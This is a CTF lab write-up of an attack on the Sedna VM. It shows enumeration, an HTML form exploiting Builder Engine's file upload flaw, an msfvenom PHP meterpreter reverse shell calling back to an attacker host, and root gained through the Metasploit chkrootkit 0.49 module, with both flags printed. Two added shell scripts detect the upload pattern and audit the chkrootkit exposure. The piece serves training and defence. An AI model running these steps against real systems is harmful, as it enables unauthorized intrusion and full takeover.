hackfest2016: Sedna CTF

As usual, I started with host discovery.

root@kali:~# netdiscover -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:5e:b4:5a 1 60 Cadmus Computer Systems
10.0.2.44 08:00:27:d7:39:26 1 60 Cadmus Computer Systems

Then I scanned the IP for open ports.

root@kali:~# nmap -p- --script=banner 10.0.2.44
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.44
Host is up (0.00059s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
53/tcp open domain
80/tcp open http
110/tcp open pop3
|_banner: +OK Dovecot (Ubuntu) ready.
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.
445/tcp open microsoft-ds
993/tcp open imaps
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE AUTH=PLAIN] Dovecot (Ubuntu) ready.
995/tcp open pop3s
|_banner: +OK Dovecot (Ubuntu) ready.
8080/tcp open http-proxy
38590/tcp open unknown
MAC Address: 08:00:27:D7:39:26 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds

This VM had a lot of open ports, which I expected to be useful. I started with SMB on 445/tcp and enumerated it with enum4linux.

root@kali:~# enum4linux 10.0.2.44
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ )
==========================
| Target Information |
==========================
Target ........... 10.0.2.44
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================
| Enumerating Workgroup/Domain on 10.0.2.44 |
=================================================
[+] Got domain/workgroup name: WORKGROUP
=========================================
| Nbtstat Information for 10.0.2.44 |
=========================================
Looking up status of 10.0.2.44
SEDNA <00> - B <ACTIVE> Workstation Service
SEDNA <03> - B <ACTIVE> Messenger Service
SEDNA <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================
| Session Check on 10.0.2.44 |
==================================
[+] Server 10.0.2.44 allows sessions using username '', password ''
========================================
| Getting domain SID for 10.0.2.44 |
========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
===================================
| OS information on 10.0.2.44 |
===================================
[+] Got OS info for 10.0.2.44 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
[+] Got OS info for 10.0.2.44 from srvinfo:
SEDNA Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
==========================
| Users on 10.0.2.44 |
==========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]
======================================
| Share Enumeration on 10.0.2.44 |
======================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Sedna server (Samba, Ubuntu))
print$ Disk Printer Drivers
Server Comment
------ -------
SEDNA Sedna server (Samba, Ubuntu)
Workgroup Master
--------- ------
WORKGROUP SEDNA
[+] Attempting to map shares on 10.0.2.44
//10.0.2.44/IPC$ Mapping: OK Listing: DENIED
//10.0.2.44/print$ Mapping: DENIED, Listing: N/A
=================================================
| Password Policy Information for 10.0.2.44 |
=================================================
[+] Attaching to 10.0.2.44 using a NULL share
[+] Trying protocol 445/SMB…
[+] Found domain(s):
[+] SEDNA
[+] Builtin
[+] Password Info for Domain: SEDNA
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===========================
| Groups on 10.0.2.44 |
===========================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
====================================================================
| Users on 10.0.2.44 via RID cycling (RIDS: 500-550,1000-1050) |
====================================================================
[I] Found new SID: S-1-5-21-2217169221-2747901371-1699642345
[I] Found new SID: S-1-22-1
[+] Enumerating users using SID S-1-5-21-2217169221-2747901371-1699642345 and logon username '', password ''
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\crackmeforpoints (Local User)
==========================================
| Getting printer info for 10.0.2.44 |
==========================================
No printers returned.

Samba allowed null sessions, so the report was full of information. Three items in it looked important.

1st: the Samba version. I checked it but could not find an exploit.

2nd: the shares. I found nothing in them.

3rd: the local user crackmeforpoints. I did not find the password. At first I tried brute forcing pop3s and imaps, but it was slow and I did not want to wait for it. This was a CTF VM, so there had to be a quicker way in; I interrupted the brute force attempts and looked for another way.

I still had two HTTP ports to check, 80/tcp and 8080/tcp. I started with 80/tcp and ran dirb.

root@kali:~# dirb http://10.0.2.44
-----------------
DIRB v2.22
By The Dark Raver
-----------------
URL_BASE: http://10.0.2.44/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.44/ ----
==> DIRECTORY: http://10.0.2.44/blocks/
==> DIRECTORY: http://10.0.2.44/files/
+ http://10.0.2.44/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://10.0.2.44/modules/
+ http://10.0.2.44/robots.txt (CODE:200|SIZE:36)
+ http://10.0.2.44/server-status (CODE:403|SIZE:289)
==> DIRECTORY: http://10.0.2.44/system/
==> DIRECTORY: http://10.0.2.44/themes/
---- Entering directory: http://10.0.2.44/blocks/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.44/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.44/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.44/system/ ----
==> DIRECTORY: http://10.0.2.44/system/core/
==> DIRECTORY: http://10.0.2.44/system/database/
==> DIRECTORY: http://10.0.2.44/system/fonts/
==> DIRECTORY: http://10.0.2.44/system/helpers/
+ http://10.0.2.44/system/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://10.0.2.44/system/language/
==> DIRECTORY: http://10.0.2.44/system/libraries/
---- Entering directory: http://10.0.2.44/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.0.2.44/system/core/ ----
==> DIRECTORY: http://10.0.2.44/system/core/compat/
+ http://10.0.2.44/system/core/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/database/ ----
==> DIRECTORY: http://10.0.2.44/system/database/drivers/
+ http://10.0.2.44/system/database/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/fonts/ ----
+ http://10.0.2.44/system/fonts/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/helpers/ ----
+ http://10.0.2.44/system/helpers/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/language/ ----
==> DIRECTORY: http://10.0.2.44/system/language/english/
+ http://10.0.2.44/system/language/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/libraries/ ----
+ http://10.0.2.44/system/libraries/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/core/compat/ ----
+ http://10.0.2.44/system/core/compat/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/database/drivers/ ----
+ http://10.0.2.44/system/database/drivers/index.html (CODE:200|SIZE:142)
==> DIRECTORY: http://10.0.2.44/system/database/drivers/mssql/
==> DIRECTORY: http://10.0.2.44/system/database/drivers/mysql/
==> DIRECTORY: http://10.0.2.44/system/database/drivers/odbc/
---- Entering directory: http://10.0.2.44/system/language/english/ ----
+ http://10.0.2.44/system/language/english/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/database/drivers/mssql/ ----
+ http://10.0.2.44/system/database/drivers/mssql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/database/drivers/mysql/ ----
+ http://10.0.2.44/system/database/drivers/mysql/index.html (CODE:200|SIZE:142)
---- Entering directory: http://10.0.2.44/system/database/drivers/odbc/ ----
+ http://10.0.2.44/system/database/drivers/odbc/index.html (CODE:200|SIZE:142)
-----------------
DOWNLOADED: 64568 - FOUND: 16

The robots.txt file did not help me, so I browsed the directories that were found. In the files directory I found some images, and some of them were about Builder Engine.

After a Google search I found an exploit for it, a file inclusion exploit, best used to open a reverse shell. I changed the IP address in the given exploit and saved it as an HTML file.

<html>
<body>
<form method="post" action="http://10.0.2.44/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>

Then I created a php reverse shell with msfvenom.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 944 bytes

I uploaded the file with the form from the exploit.

After I clicked the "send" button, the response returned the location of the uploaded reverse shell file.

{"files":[{"name":"shell.php","size":945,"type":"application\/x-php","url":"http:\/\/10.0.2.44\/files\/shell.php","deleteUrl":"http:\/\/10.0.2.44\/themes\/dashboard\/assets\/plugins\/jquery-file-upload\/server\/php\/?file=shell.php","deleteType":"DELETE"}]}
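The upload above leaves a distinctive pair of requests in the web server log: a POST to the plugin's PHP handler, then a GET of the uploaded script from /files/. As an added example (not part of the writeup, Builder Engine or the jQuery File Upload plugin), this POSIX sh/awk filter flags a client that does both; the Apache combined-format log lines are constructed.

```shell
#!/bin/sh
# Added detection example (not from the writeup, not part of jQuery File Upload
# or Builder Engine). It correlates the two requests made above: a POST to the
# plugin's PHP upload handler, then a GET of a .php file under /files/ from the
# same client. The Apache combined-format log lines below are constructed.

LOG_SAMPLE='10.0.2.5 - - [20/Mar/2017:14:46:50 -0400] "GET /index.html HTTP/1.1" 200 101 "-" "Mozilla/5.0"
10.0.2.5 - - [20/Mar/2017:14:46:58 -0400] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 194 "-" "Mozilla/5.0"
10.0.2.9 - - [20/Mar/2017:14:47:02 -0400] "GET /files/ HTTP/1.1" 200 1323 "-" "curl/7.52.1"
10.0.2.5 - - [20/Mar/2017:14:47:10 -0400] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.2.9 - - [20/Mar/2017:14:47:30 -0400] "GET /files/logo.png HTTP/1.1" 200 4110 "-" "curl/7.52.1"'

# flag_upload_then_exec: reads combined-format log lines on stdin and prints
# "<client ip> <path>" for every GET of a PHP script under /files/ by a client
# that earlier POSTed to the jquery-file-upload PHP handler. Field layout:
# $1 client, $6 "METHOD (leading quote stripped), $7 request path (query cut).
flag_upload_then_exec() {
  awk '
    { ip = $1; method = $6; path = $7; sub(/^"/, "", method); sub(/[?].*/, "", path) }
    method == "POST" && path ~ /\/jquery-file-upload\/server\/php\/?$/ { uploaded[ip] = 1 }
    method == "GET" && (ip in uploaded) && path ~ /^\/files\/.*\.ph(p[0-9]?|tml)$/ { print ip, path }
  '
}

# count_alerts: number of alert lines the embedded sample produces
count_alerts() {
  printf '%s\n' "$LOG_SAMPLE" | flag_upload_then_exec | wc -l | tr -d ' '
}

# Stand-alone use on a real log: flag_upload_then_exec < /var/log/apache2/access.log
printf '%s\n' "$LOG_SAMPLE" | flag_upload_then_exec
```

A legitimate use of the plugin also POSTs to that handler, so the follow-up fetch of a script from /files/ is the discriminator; the server should refuse to execute anything from the upload directory in the first place.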

I opened Metasploit and launched a listener.

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 10.0.2.5
lhost => 10.0.2.5
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] Starting the payload handler…

After I requested the shell script I had uploaded, I got a reverse shell from the VM.

[*] Sending stage (33068 bytes) to 10.0.2.44
[*] Meterpreter session 1 opened (10.0.2.5:4444 -> 10.0.2.44:41432) at 2017-03-20 14:47:14 -0400
meterpreter >

First flag was in the /var/www directory.

meterpreter > ls
Listing: /var/www
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 33 fil 2016-10-22 13:33:24 -0400 flag.txt
40755/rwxr-xr-x 4096 dir 2016-10-25 09:27:06 -0400 html
meterpreter > cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289

Now it was time to escalate privileges. I had some unsuccessful exploit attempts against the kernel version. Then I looked through the /etc folder for something I could exploit to gain root, and I saw that chkrootkit was installed.

meterpreter > cd etc
meterpreter > ls
Listing: /etc
=============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2016-10-07 15:16:49 -0400 .java
...
40755/rwxr-xr-x 4096 dir 2016-10-07 15:15:42 -0400 ca-certificates
100644/rw-r--r-- 7464 fil 2016-10-07 15:16:49 -0400 ca-certificates.conf
40755/rwxr-xr-x 4096 dir 2016-10-07 15:16:24 -0400 calendar
42750/rwxr-x--- 4096 dir 2016-10-07 15:16:54 -0400 chatscripts
40755/rwxr-xr-x 4096 dir 2016-10-22 13:04:31 -0400 chkrootkit
100644/rw-r--r-- 1332 fil 2016-10-07 15:17:29 -0400 colord.conf
40755/rwxr-xr-x 4096 dir 2016-10-07 15:11:31 -0400 console-setup
...

Checked for its version.

meterpreter > cd chkrootkit
meterpreter > ls
Listing: /etc/chkrootkit
========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 4216 fil 2016-10-22 13:04:31 -0400 ACKNOWLEDGMENTS
100444/r--r--r-- 1343 fil 2016-10-22 13:04:31 -0400 COPYRIGHT
100444/r--r--r-- 1636 fil 2016-10-22 13:04:31 -0400 Makefile
100444/r--r--r-- 14321 fil 2016-10-22 13:04:31 -0400 README
100444/r--r--r-- 1323 fil 2016-10-22 13:04:31 -0400 README.chklastlog
100444/r--r--r-- 1292 fil 2016-10-22 13:04:31 -0400 README.chkwtmp
100444/r--r--r-- 7195 fil 2016-10-22 13:04:31 -0400 check_wtmpx.c
100444/r--r--r-- 7107 fil 2016-10-22 13:04:31 -0400 chkdirs.c
100444/r--r--r-- 7725 fil 2016-10-22 13:04:31 -0400 chklastlog.c
100444/r--r--r-- 9742 fil 2016-10-22 13:04:31 -0400 chkproc.c
100755/rwxr-xr-x 76181 fil 2016-10-22 13:04:31 -0400 chkrootkit
100444/r--r--r-- 582 fil 2016-10-22 13:04:31 -0400 chkrootkit.lsm
100444/r--r--r-- 5594 fil 2016-10-22 13:04:31 -0400 chkutmp.c
100444/r--r--r-- 2213 fil 2016-10-22 13:04:31 -0400 chkwtmp.c
100444/r--r--r-- 8892 fil 2016-10-22 13:04:31 -0400 ifpromisc.c
100444/r--r--r-- 2437 fil 2016-10-22 13:04:31 -0400 strings.c
meterpreter > cat README
chkrootkit V. 0.49

Yes! This was something I could try to exploit. So I backgrounded the Metasploit session and searched for chkrootkit.

meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) > search chkrootkit
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/local/chkrootkit 2014-06-04 manual Chkrootkit Local Privilege Escalation
msf exploit(handler) > use exploit/unix/local/chkrootkit
msf exploit(chkrootkit) > options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(chkrootkit) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/php www-data (33) @ Sedna 10.0.2.5:4444 -> 10.0.2.44:41432 (10.0.2.44)
msf exploit(chkrootkit) > set session 1
session => 1
msf exploit(chkrootkit) > exploit
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 10.0.2.5:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron…

After a while, I gained a new session with root.

[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo rEmlPWGkL1wi5JOb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: "rEmlPWGkL1wi5JOb\r\n"
[*] Matching…
[*] A is input…
[*] Command shell session 2 opened (10.0.2.5:4444 -> 10.0.2.44:41433) at 2017-03-20 14:55:04 -0400
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/php www-data (33) @ Sedna 10.0.2.5:4444 -> 10.0.2.44:41432 (10.0.2.44)
2 shell unix 10.0.2.5:4444 -> 10.0.2.44:41433 (10.0.2.44)
msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2…
1280966135
UxVexjuFsKFwWPFLYaXNmoqgNQUMODBo
true
mgZNVmnxnOWjCKPRJwTFXJZfsfZPFBYP
ERROR: ld.so: object '/tmp/ofs-lib.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
DozbjCajNjYyKqeOGiNuEBKzuDlYHpQQ
YdOiZRijWnVqetTEvUNZrnpspaXWUltq
whoami
ERROR: ld.so: object '/tmp/ofs-lib.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
root
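The module output above says what it relies on: an old chkrootkit, cron running it as root, and an executable file it stages at /tmp/update. As an added example (not from the writeup, and not chkrootkit's or Metasploit's own code), here is a small POSIX sh audit that checks those same three conditions on a host so a defender can spot both the exposure and an in-progress attempt; ROOT_PREFIX and the function names are my own assumptions.

```shell
#!/bin/sh
# Added audit helper: not from the writeup, chkrootkit or Metasploit. It checks
# what the module output above depends on: chkrootkit at or below 0.49 (the
# README version on this box), a cron entry running it as root, and an executable
# /tmp/update. ROOT_PREFIX is a hypothetical knob to point the checks at a test tree.
ROOT_PREFIX="${ROOT_PREFIX:-}"
VULN_MAX="0.49"

# chkrootkit_version FILE: print the version from a "chkrootkit V. 0.49" line
chkrootkit_version() {
  sed -n 's/^chkrootkit V\. *\([0-9][0-9.]*\).*/\1/p' "$1" | head -n 1
}

# version_le A B: succeed when dotted version A <= B, compared component-wise
version_le() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, "."); k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      if (x[i] + 0 < y[i] + 0) exit 0
      if (x[i] + 0 > y[i] + 0) exit 1
    }
    exit 0
  }'
}

# cron_runs_chkrootkit: succeed if a system cron file references chkrootkit
# (Ubuntu's package ships /etc/cron.daily/chkrootkit, which runs as root)
cron_runs_chkrootkit() {
  grep -rqs 'chkrootkit' "$ROOT_PREFIX/etc/crontab" "$ROOT_PREFIX/etc/cron.d" \
    "$ROOT_PREFIX/etc/cron.daily"
}

# staged_update_present: succeed if /tmp/update exists and is executable, the
# file the module stages ("Payload written to /tmp/update") for cron to run
staged_update_present() {
  [ -x "$ROOT_PREFIX/tmp/update" ]
}

# audit README_FILE: print findings; return 0 clean, 1 affected version,
# 2 staged payload present
audit() {
  ver="$(chkrootkit_version "$1")"; rc=0
  if [ -n "$ver" ] && version_le "$ver" "$VULN_MAX"; then
    echo "chkrootkit $ver is at or below $VULN_MAX (affected)"; rc=1
  else
    echo "chkrootkit ${ver:-unknown}: outside the affected range"
  fi
  cron_runs_chkrootkit && echo "cron runs chkrootkit: a staged /tmp/update would run as root"
  if staged_update_present; then
    echo "ALERT: executable $ROOT_PREFIX/tmp/update found, matching the module's staging"; rc=2
  fi
  return "$rc"
}

if [ -n "${1:-}" ]; then audit "$1"; fi  # live use: sh audit.sh /etc/chkrootkit/README
```

Reading /etc/cron.daily and /tmp needs no privileges, so the audit can run as an ordinary user; a hit on the staged file is the same condition the module waits for and is worth an immediate alert.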

Then I searched for flag.txt files.

updatedb
ERROR: ld.so: object '/tmp/ofs-lib.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
locate flag.txt
ERROR: ld.so: object '/tmp/ofs-lib.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
/root/flag.txt
/var/www/flag.txt
cat /root/flag.txt
ERROR: ld.so: object '/tmp/ofs-lib.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
a10828bee17db751de4b936614558305

I think the other flag has something to do with the crackmeforpoints user, but my main goal was to get root access, so I did not try anything further with that user account.